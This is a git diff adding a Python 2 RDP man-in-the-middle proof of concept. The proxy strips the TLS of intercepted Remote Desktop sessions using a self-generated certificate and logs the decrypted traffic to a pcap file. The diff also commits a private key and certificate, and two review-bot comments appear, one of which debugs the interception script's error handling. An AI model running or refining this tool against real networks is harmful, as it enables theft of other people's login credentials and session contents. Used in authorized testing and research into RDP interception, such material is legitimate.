diff --git a/cert.key b/cert.key
new file mode 100644
index 0000000..51fbfff
--- /dev/null
+++ b/cert.key
@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMv0RTboOJRtedKK
+hdI4bYPafVYrnpuNjlaD83ra5mf8reYmXs/EntMSz5YgbrZhWj2xqKrJ3FElZygV
+XbD/C66pbcJtyqm7zkRbNrjuNkBRfLEjDCaUD66vWr5e/sC8eqHmHQoSw/JJly+x
+yFsLqHwMoDYfe/SF7Q0gTLe2h2jHAgMBAAECgYAirXLDRjKwkfifoqvkNXHxdEnR
+R/Nc0XG9JgxU/DkmvyC2PBnsy6qRiuY+yV7ppZ3ZVYavG0lZhrmGaDOY75SFnPoC
+ypjOaGkLeVvTDNjWrHuDytHeHHnlbtdHTLqetlyoQ2k1NdOngGPUPgJKIXbvq4t/
+MH0vgAIwDR5vTOWaAQJBAPu136jiO+zhOPJOc4BjMVWD9iCBZjbnTvI7+xSXq78o
+hjlbRpxYUp3lWKr6rE+X0jIxSwa5TzLLa+hY8hwVGccCQQDPbg1w5qjqZH1IcCdF
+h853OR7Y930/rotrIeJUE5tpRHJ4Iq1E0pAdwNm34BTiCiii1QtOgtL4QM3fg46S
+ozkBAkAYaWcrpeVR7/Xp6hnhlb0vIgE43dPf90b8zzxmnt8VRwTdgzCx8Q7yKVAU
+JQOZJIxKOeWg3VAFCR2KBzZT6uf5AkBjbyYSUP/4HGPSLbElq4xVqpQW/cyUkl9S
+49NS6nM9awpUfIsCys069g9oDYr1MFl6dRYOdLgdOTN3SeE2efgBAkBTbgblndDK
+151g2ctz+6GUGNt8zv2VHtPna0dCFH8lSTLESHZ3UC3HgOLFIMG7qKTDCrPoYnLq
+vPt+tivx2/Ao
+-----END PRIVATE KEY-----
diff --git a/cert.pem b/cert.pem
new file mode 100644
index 0000000..1b81a32
--- /dev/null
+++ b/cert.pem
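Review bot: This commit checks a private key (cert.key) and its matching certificate (cert.pem, next hunk) into the repository even though gencert.sh already regenerates both locally; committed key material is a standing liability even for a throwaway PoC, because anyone who reuses the repo unchanged serves a key that is public. Decoding the certificate's DER, it appears to carry CN `MITM-POC` with a validity window of 2014-04-20 to 2015-04-20, so it has also long expired. Drop both files from the commit, add `cert.pem` and `cert.key` to a `.gitignore`, and document the setup step in a README line such as `Run ./gencert.sh once to create cert.pem/cert.key before starting the proxy.`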
@@ -0,0 +1,16 @@
+-----BEGIN CERTIFICATE-----
+MIICfjCCAeegAwIBAgIJAJLBLAkzV96EMA0GCSqGSIb3DQEBBQUAMFgxCzAJBgNV
+BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX
+aWRnaXRzIFB0eSBMdGQxETAPBgNVBAMMCE1JVE0tUE9DMB4XDTE0MDQyMDE4NTUz
+MloXDTE1MDQyMDE4NTUzMlowWDELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUt
+U3RhdGUxITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDERMA8GA1UE
+AwwITUlUTS1QT0MwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMv0RTboOJRt
+edKKhdI4bYPafVYrnpuNjlaD83ra5mf8reYmXs/EntMSz5YgbrZhWj2xqKrJ3FEl
+ZygVXbD/C66pbcJtyqm7zkRbNrjuNkBRfLEjDCaUD66vWr5e/sC8eqHmHQoSw/JJ
+ly+xyFsLqHwMoDYfe/SF7Q0gTLe2h2jHAgMBAAGjUDBOMB0GA1UdDgQWBBSb3fDY
+rSIEImpAqbKWCZQA8ySnizAfBgNVHSMEGDAWgBSb3fDYrSIEImpAqbKWCZQA8ySn
+izAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBADuewBJdn+SQqmNIflhS
+qJg8Ugz4Xe8OresStFboz7qAXkHZOYlHqC79bI4OWHMnW+Dpi4PybypykIxxgQ/r
+7MAAgBhzYOr2N4orEB8DcYR4GRgJhNfksQcCdlSzueXo4qcqgX+mgZTV3NFWjM9l
+K4jEPaTigufYPTO3eMqzzRL2
+-----END CERTIFICATE-----
diff --git a/gencert.sh b/gencert.sh
new file mode 100755
index 0000000..ac9ba49
--- /dev/null
+++ b/gencert.sh
@@ -0,0 +1,2 @@
+#!/bin/bash
+openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.key
diff --git a/rdps2rdp_pcap.py b/rdps2rdp_pcap.py
new file mode 100755
index 0000000..37bfc1d
--- /dev/null
+++ b/rdps2rdp_pcap.py
@@ -0,0 +1,76 @@
+#!/usr/bin/env python
+#DiabloHorn http://diablohorn.wordpress.com
+#Inspired by: https://labs.portcullis.co.uk/blog/ssl-man-in-the-middle-attacks-on-rdp/
+#Resources:
+# http://stackoverflow.com/questions/7574092/python-scapy-wrpcap-how-do-you-append-packets-to-a-pcap-file
+# http://efod.se/media/thesis.pdf
+
+import logging
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
+
+import sys
+from scapy.all import *
+from socket import *
+import ssl
+import thread
+import binascii
+
+BUFF = 1024
+OUTPUTPCAP = "output.pcap"
+LISTENCON = ('0.0.0.0', 3389)
+REMOTECON = ('10.50.0.125', 3389)
+
+def savepcap(src,dst,data):
+ pktdump = PcapWriter(OUTPUTPCAP, append=True, sync=True)
+ pktinfo = Ether()/IP(src=src[0],dst=dst[0])/TCP(sport=src[1],dport=dst[1])/data
+ pktdump.write(pktinfo)
+ pktdump.close()
+
+def handler(clientsock,addr):
+ serversock = socket(AF_INET, SOCK_STREAM)
+ serversock.connect(REMOTECON)
+
+ #read client rdp data
+ serversock.sendall(clientsock.recv(19))
+ #read server rdp data and check if ssl
+ temp = serversock.recv(19)
+ clientsock.sendall(temp)
+ if(temp[15] == '\x01'):
+ print('Intercepting rdp session from %s' % clientsock.getpeername()[0])
+ sslserversock = ssl.wrap_socket(serversock,ssl_version=ssl.PROTOCOL_TLSv1)
+ sslserversock.do_handshake() #just in case
+ sslclientsock = ssl.wrap_socket(clientsock, server_side=True,certfile='cert.pem',keyfile='cert.key',ssl_version=ssl.PROTOCOL_TLSv1)
+ sslclientsock.do_handshake() #just in case
+ thread.start_new_thread(trafficloop,(sslclientsock,sslserversock,True))
+ thread.start_new_thread(trafficloop,(sslserversock,sslclientsock,True))
+ else:
+ print('Passing through %s' % clientsock.getpeername()[0])
+ thread.start_new_thread(trafficloop,(clientsock,serversock,False))
+ thread.start_new_thread(trafficloop,(serversock,clientsock,False))
+
+def trafficloop(source,destination,dopcap):
+ string = ' '
+ try:
+ while string:
+ string = source.recv(BUFF)
+ if string:
+ if dopcap:
+ savepcap(source.getpeername(),destination.getpeername(),string)
+ destination.sendall(string)
+ else:
+ source.shutdown(socket.SHUT_RD)
+ destination.shutdown(socket.SHUT_WR)
+ except:
+ print('some error happend')
+ pass #being highly lazy
+
+if __name__ == '__main__':
+ serversock = socket(AF_INET, SOCK_STREAM)
+ serversock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
+ serversock.bind(LISTENCON)
+ serversock.listen(5)
+ while 1:
+ print('waiting for connection...')
+ clientsock, addr = serversock.accept()
+ print('...connected from:', addr)
+ thread.start_new_thread(handler,(clientsock,addr))
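Review bot: `source.shutdown(socket.SHUT_RD)` and `destination.shutdown(socket.SHUT_WR)` in trafficloop look the constants up on the wrong object: `from socket import *` rebinds the name `socket` to the socket class, which has no `SHUT_RD`/`SHUT_WR` attribute, so every orderly close should raise AttributeError, which the bare `except:` right after it swallows and reports as 'some error happend'. Use the star-imported constants directly, `source.shutdown(SHUT_RD)` and `destination.shutdown(SHUT_WR)`, and narrow the handler to `except (error, ssl.SSLError) as exc:` with `exc` included in the printed message so a real failure is distinguishable from a normal close. Separately, handler indexes `temp[15]` on the result of `serversock.recv(19)`, which may return fewer than 16 bytes; a short read raises IndexError in the handler thread, so the check should be guarded with `len(temp) > 15`. The file is Python 2 only (`thread` module, byte-string indexing compared with `'\x01'`), which the shebang and a header comment should state; the hunk's indentation is collapsed in this rendering, so nesting is inferred from the code.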